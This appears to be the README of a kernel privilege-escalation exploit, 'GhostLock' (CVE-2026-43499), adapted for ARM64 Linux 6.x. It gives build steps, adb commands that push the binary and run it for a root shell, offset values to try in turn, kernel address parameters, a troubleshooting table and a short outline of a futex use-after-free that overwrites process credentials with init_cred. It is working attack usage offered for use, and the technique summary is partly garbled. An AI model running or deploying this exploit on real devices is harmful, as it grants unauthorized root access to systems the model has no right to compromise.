
GhostLock (CVE-2026-43499) adaptation for non-Android Linux 6.x ARM64
A GhostLock (CVE-2026-43499) privilege escalation exploit targeting non-Android Linux 6.x ARM64 kernels.
| Item | Value |
|---|---|
| Architecture | ARM64 (AArch64) |
| VA_BITS | 39 |
| KIMAGE_TEXT_BASE | 0xffffffc008000000 |
| Kernel version | 6.x |
| SELinux | None |
| ashmem | None |
| configfs | None |
make
make android-arm64 NDK=/path/to/android-ndk
Builds are triggered automatically after pushing; just download the artifact.
# Push to the target device
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e
# Get a root shell
adb shell /data/local/tmp/e --shell
# Adjust the pselect offset (if the default doesn't work)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell
# Specify the physical load address
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell
| Variable | Default | Description |
|---|---|---|
PSELECT_SHIFT | -2 | Offset adjustment for the pselect waiter on the stack |
KPHYS | 0x80000000 | Kernel physical load address |
KIMAGE_TEXT_BASE | 0xffffffc008000000 | Kernel virtual base address |
FUTEX_CMP_REQUEUE_PI triggers a UAF in remove_waiter()rt_mutex_waiter lands in the stack_fds buffertask_struct->cred with init_credThis version is a stripped-down variant of ghostlock-oneplus:
| Symptom | Possible Cause | Solution |
|---|---|---|
| Device reboots | Incorrect PSELECT_SHIFT | Try each value from -4 to +4 |
| No effect | Incorrect KPHYS | Verify the correct value in /proc/iomem |
| perf_event_open failed | seccomp restriction | Try running via ADB shell |
| No root | Offset mismatch | Confirm the kernel version, check TASK_CRED_OFF |
This tool is for security research purposes only. Users assume all responsibility.